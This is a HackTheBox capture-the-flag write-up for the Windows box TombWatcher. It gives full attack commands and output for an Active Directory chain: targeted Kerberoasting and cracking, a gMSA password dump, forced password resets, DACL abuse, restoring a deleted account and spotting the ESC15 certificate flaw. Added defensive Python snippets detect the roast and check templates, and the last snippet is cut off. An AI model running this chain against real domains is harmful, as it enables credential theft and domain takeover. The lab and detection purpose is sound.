
HTB-TombWatcher

HTB-Machine Hackthebox Windows
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys recording hands-on experience, sharing tools and techniques, and is committed to continuous learning and growth.

Box Info

OS: Windows
Difficulty: Medium

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Nmap

[root@kali] /home/kali/TombWatcher  
❯ nmap TombWatcher.htb -sV -A          

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 15:48:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found

Add DC01.tombwatcher.htb to /etc/hosts.

Bloodhound

[root@kali] /home/kali/TombWatcher  
❯ bloodhound-python -u henry  -p 'H3nry_987TGV!'  -d tombwatcher.htb -ns 10.10.11.72 -c All --zip                                             ⏎
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
WARNING: Connection timed out while resolving sids
WARNING: DCE/RPC connection failed: Error occurs while reading from remote(104)
WARNING: DCE/RPC connection failed: [Errno 32] Broken pipe
WARNING: DCE/RPC connection failed: [Errno 32] Broken pipe
ERROR: Unhandled exception in computer DC01.tombwatcher.htb processing: [Errno 32] Broken pipe
INFO: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/bloodhound/enumeration/computers.py", line 151, in process_computer
    c.rpc_close()
    ~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/bloodhound/ad/computer.py", line 459, in rpc_close
    self.smbconnection.logoff()
    ~~~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 347, in logoff
    return self._SMBConnection.logoff()
           ~~~~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1616, in logoff
    packetID = self.sendSMB(packet)
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 499, in sendSMB
    self._NetBIOSSession.send_packet(packet)
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 914, in send_packet
    self._sock.sendall(p.rawData())
    ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^
BrokenPipeError: [Errno 32] Broken pipe

INFO: Done in 00M 13S
INFO: Compressing output into 20250608115935_bloodhound.zip

BloodHound shows that henry has WriteSPN over Alfred.

targetedKerberoast

Download the tool used below:

[root@kali] /home/kali/TombWatcher/targetedKerberoast (main) 
❯ python targetedKerberoast.py -v -d tombwatcher.htb -u henry -p 'H3nry_987TGV!'                                                              ⏎
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$10991a21dbce7da3ffce234bf1e340f7$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
[VERBOSE] SPN removed successfully for (Alfred)

Crack the hash with john:

[root@kali] /home/kali/TombWatcher  
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
basketball       (?)     
1g 0:00:00:00 DONE (2025-06-08 12:33) 100.0g/s 204800p/s 204800c/s 204800C/s 123456..lovers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

The password is basketball.
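From the defender's side, the WriteSPN abuse above leaves a distinctive trail in the domain controller's Security log: an SPN value is added to a user, a service ticket for that account is requested with RC4, and the SPN value is deleted again a moment later. The Python below is an added example (it is not part of this write-up or of the targetedKerberoast tool) that correlates those three steps over constructed, simplified event records standing in for event IDs 5136 (directory service object modified) and 4769 (Kerberos service ticket requested). The account names svc_admin, svc_sql and alice, the SPN values and the flat field names are constructed; real events carry these values in EventData XML (ObjectDN, AttributeLDAPDisplayName, OperationType, ServiceName, TicketEncryptionType), and 5136 only appears when Directory Service Changes auditing and a SACL on the user objects are in place.

```python
"""Correlate SPN add / RC4 TGS request / SPN delete into a targeted-Kerberoast finding.

Added example with constructed, simplified events; not code from the write-up.
"""
from datetime import datetime, timedelta

# Constructed sample events. 5136 = "A directory service object was modified",
# 4769 = "A Kerberos service ticket was requested". Encryption type 0x17 is
# RC4-HMAC (what a roast needs), 0x12 is AES256-CTS-HMAC-SHA1-96.
SAMPLE_EVENTS = [
    # 1) henry writes an SPN onto Alfred, pulls an RC4 ticket, removes the SPN again
    {"time": "2025-06-08T12:31:02", "id": 5136, "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "operation": "add", "value": "HOST/x7qk2p"},
    {"time": "2025-06-08T12:31:03", "id": 4769, "account": "henry@TOMBWATCHER.HTB",
     "service": "Alfred", "etype": "0x17"},
    {"time": "2025-06-08T12:31:04", "id": 5136, "subject": "henry",
     "object": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "operation": "delete", "value": "HOST/x7qk2p"},
    # 2) benign (constructed names): an admin registers an SPN for a service account
    #    and leaves it; the first ticket for it is requested with AES, hours later
    {"time": "2025-06-08T09:00:00", "id": 5136, "subject": "svc_admin",
     "object": "CN=svc_sql,OU=Services,DC=tombwatcher,DC=htb",
     "attribute": "servicePrincipalName", "operation": "add",
     "value": "MSSQLSvc/sql01.tombwatcher.htb:1433"},
    {"time": "2025-06-08T11:15:00", "id": 4769, "account": "alice@TOMBWATCHER.HTB",
     "service": "svc_sql", "etype": "0x12"},
]


def _cn(dn):
    """First RDN value of a distinguishedName: 'CN=Alfred,CN=Users,...' -> 'Alfred'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def _is_spn_change(event, operation):
    return (event["id"] == 5136
            and event.get("attribute") == "servicePrincipalName"
            and event.get("operation") == operation)


def detect_targeted_kerberoast(events, window=timedelta(minutes=15)):
    """Return one finding per SPN write followed, within `window`, by an RC4 service
    ticket request for the same account. Severity is 'high' when the SPN is removed
    again inside the window (the add/roast/remove triple is the tooling's signature)
    and 'medium' when the SPN is only added and roasted."""
    events = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    findings = []
    for i, add in enumerate(events):
        if not _is_spn_change(add, "add"):
            continue
        target = _cn(add["object"]).lower()
        t0 = datetime.fromisoformat(add["time"])
        later = [e for e in events[i + 1:]
                 if datetime.fromisoformat(e["time"]) - t0 <= window]
        roasts = [e for e in later if e["id"] == 4769
                  and e["service"].lower() == target and e["etype"] == "0x17"]
        if not roasts:
            continue
        removed = any(_is_spn_change(e, "delete") and e["value"] == add["value"]
                      and _cn(e["object"]).lower() == target for e in later)
        findings.append({
            "target": _cn(add["object"]),
            "spn_written_by": add["subject"],
            "tgs_requested_by": roasts[0]["account"],
            "spn": add["value"],
            "severity": "high" if removed else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"[{f['severity']}] SPN {f['spn']!r} written onto {f['target']} by "
              f"{f['spn_written_by']}; RC4 TGS then requested by {f['tgs_requested_by']}")
```

The RC4 condition is what makes the correlation cheap to run: accounts that only allow AES service tickets (msDS-SupportedEncryptionTypes) and that carry long random passwords do not yield to the wordlist step shown above, so an RC4 ticket request against a user account right after an SPN write is a low-noise signal on its own.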

Bloodhound2

[root@kali] /home/kali/TombWatcher  
❯ bloodhound-python -u alfred  -p 'basketball'  -d tombwatcher.htb -ns 10.10.11.72 -c All --zip  
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
ERROR: Unhandled exception in computer DC01.tombwatcher.htb processing: The NETBIOS connection with the remote host timed out.
INFO: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read
    received = self._sock.recv(bytes_left)
TimeoutError: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/bloodhound/enumeration/computers.py", line 123, in process_computer
    sessions = c.rpc_get_sessions()
  File "/usr/lib/python3/dist-packages/bloodhound/ad/computer.py", line 470, in rpc_get_sessions
    resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/srvs.py", line 3077, in hNetrSessionEnum
    return dce.request(request)
           ~~~~~~~~~~~^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 860, in request
    self.call(request.opnum, request, uuid)
    ~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 849, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
           ~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1302, in send
    self._transport_send(data)
    ~~~~~~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1239, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
    ~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/transport.py", line 543, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 543, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1739, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1443, in write
    ans = self.recvSMB(packetID)
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 514, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 917, in recv_packet
    data = self.__read(timeout)
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 1004, in __read
    data = self.read_function(4, timeout)
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 988, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.

INFO: Done in 00M 12S
INFO: Compressing output into 20250608123357_bloodhound.zip

BloodHound shows that alfred can add himself to the INFRASTRUCTURE group:

[root@kali] /home/kali/TombWatcher  
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u alfred -p 'basketball' add groupMember INFRASTRUCTURE alfred                          ⏎
[+] alfred added to INFRASTRUCTURE

Collect with BloodHound again: as a member of the group, alfred has ReadGMSAPassword over Ansible_dev$.

GMSA Dump

Use the tool shown below:

[root@kali] /home/kali/TombWatcher/gMSADumper (main) 
❯ python gMSADumper.py -u alfred -p basketball -d tombwatcher.htb 
Users or groups who can read password for ansible_dev$:
 > Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a

Bloodhound3

[root@kali] /home/kali/TombWatcher  
❯ bloodhound-python -u 'ansible_dev$'  --hashes ':1c37d00093dc2a5f25176bf2d474afdc' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 13S
INFO: Compressing output into 20250608124415_bloodhound.zip

Change Sam’s Pass

The SAM user's password can be reset directly:

[root@kali] /home/kali/TombWatcher  
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb' -u 'ansible_dev$'  -p ':1c37d00093dc2a5f25176bf2d474afdc' set password SAM 'Abc123456@'  ⏎
[+] Password changed successfully!

Bloodhound4

[root@kali] /home/kali/TombWatcher  
❯ bloodhound-python  -u 'SAM' -p 'Abc123456@' -d tombwatcher.htb -ns 10.10.11.72 -c All --zip                                               
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 13S
INFO: Compressing output into 20250608124754_bloodhound.zip

Change John’s Pass

[root@kali] /home/kali/TombWatcher  
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb'  -u 'SAM' -p 'Abc123456@' set password john 'Abc123456@'                                 
[+] Password changed successfully!

That gives user.txt.

Privilege Escalation

Collect with BloodHound once more and review the rights john holds in the domain.

john has GenericAll over the ADCS organizational unit; the next step is to take over its child objects.

[root@kali] /home/kali/TombWatcher  
❯ impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'john' -target-dn 'OU=ADCS,DC=TOMBWATCHER,DC=HTB' 'tombwatcher.htb'/'john':'Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
  'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
  'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
  'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
  'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
  'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
  'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
  'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
  'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
  'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
  'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
  'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250609-020453.bak
[*] DACL modified successfully!

Change Cert_admin’s Pass

[root@kali] /home/kali/TombWatcher  
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb'  -u 'john' -p 'Abc123456@' set password cert_admin 'Abc123456@'                          ⏎
[+] Password changed successfully!

Tips

If the following error appears and the password cannot be changed, make the change from PowerShell instead:

[root@kali] /home/kali/TombWatcher  
❯ bloodyAD --host '10.10.11.72' -d 'tombwatcher.htb'  -u 'john' -p 'Abc123456@' set password cert_admin 'Abc123456@' 
Traceback (most recent call last):
  File "/usr/bin/bloodyAD", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
    output = args.func(conn, **params)
  File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/set.py", line 86, in password
    conn.ldap.bloodymodify(target, {"unicodePwd": op_list})
    ~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 281, in bloodymodify
    self.modify(self.dnResolver(target), changes, controls, encode=encode),
                ~~~~~~~~~~~~~~~^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 265, in dnResolver
    ).result()
      ~~~~~~^^
  File "/usr/lib/python3.13/concurrent/futures/_base.py", line 456, in result
    return self.__get_result()
           ~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3.13/concurrent/futures/_base.py", line 401, in __get_result
    raise self._exception
  File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 259, in asyncDnResolver
    raise NoResultError(self.domainNC, ldap_filter)
bloodyAD.exceptions.NoResultError: [-] No object found in DC=tombwatcher,DC=htb with filter: (sAMAccountName=cert_admin)

Make the change as follows:

*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : 34509cb3-2b23-417b-8b98-13f0bd953319

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass       : user
ObjectGUID        : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass       : user
ObjectGUID        : c1f1f0fe-df9c-494c-bf05-0679e181b358

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass       : user
ObjectGUID        : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf



*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents> Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "Abc123456@" -AsPlainText -Force)

Certipy Find

[root@kali] /home/kali/TombWatcher  
❯ certipy find -u cert_admin -p "Abc123456@" -dc-ip 10.10.11.72 -vulnerable

Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250609023015_Certipy.txt'
[*] Wrote text output to '20250609023015_Certipy.txt'
[*] Saving JSON output to '20250609023015_Certipy.json'
[*] Wrote JSON output to '20250609023015_Certipy.json'

[root@kali] /home/kali/TombWatcher  
❯ cat 20250609023015_Certipy.txt 
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : TOMBWATCHER.HTB\Administrators
      Access Rights
        ManageCa                        : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        ManageCertificates              : TOMBWATCHER.HTB\Administrators
                                          TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Enroll                          : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

The report shows ESC15.
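The ESC15 finding rests on a handful of template attributes that are all visible in the text report above. As an added example (not Certipy's own code and not the author's), the Python below parses the "Certificate Templates" section of that text format and re-applies the precondition from the remark: schema version 1, enrollee-supplied subject, no manager approval and no authorized signatures, plus an enrollment principal outside the administrative groups. The first template in the embedded sample is the WebServer entry copied from the report above, trimmed to the relevant fields; the second, WebServerHardened, is a constructed variant with manager approval switched on, to show what a remediated template looks like to the same check.

```python
"""Parse a Certipy text report and re-apply the ESC15 precondition.

Added example, not Certipy's code. The first template below is copied from the
report on this page (trimmed); 'WebServerHardened' is a constructed variant.
"""
import re

SAMPLE_REPORT = r"""
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Template Created                    : 2024-11-16T00:57:49+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
  1
    Template Name                       : WebServerHardened
    Enabled                             : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : True
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\cert_admin
"""

KEY_VALUE = re.compile(r"^(\s+)(\S.*?)\s+:\s*(.*)$")  # indented "Key : value" line
ENTRY = re.compile(r"^  \d+$")                         # "  0", "  1": start of an entry
ADMIN_GROUPS = ("\\Domain Admins", "\\Enterprise Admins", "\\Administrators")


def parse_certipy_report(text):
    """Parse the 'Certificate Templates' section into one dict per template.

    Every value is a list: fields such as 'Enrollment Rights' continue on the
    following lines, aligned under the first value and without a colon."""
    section, templates, current = None, [], None
    last_key, key_indent = None, 0
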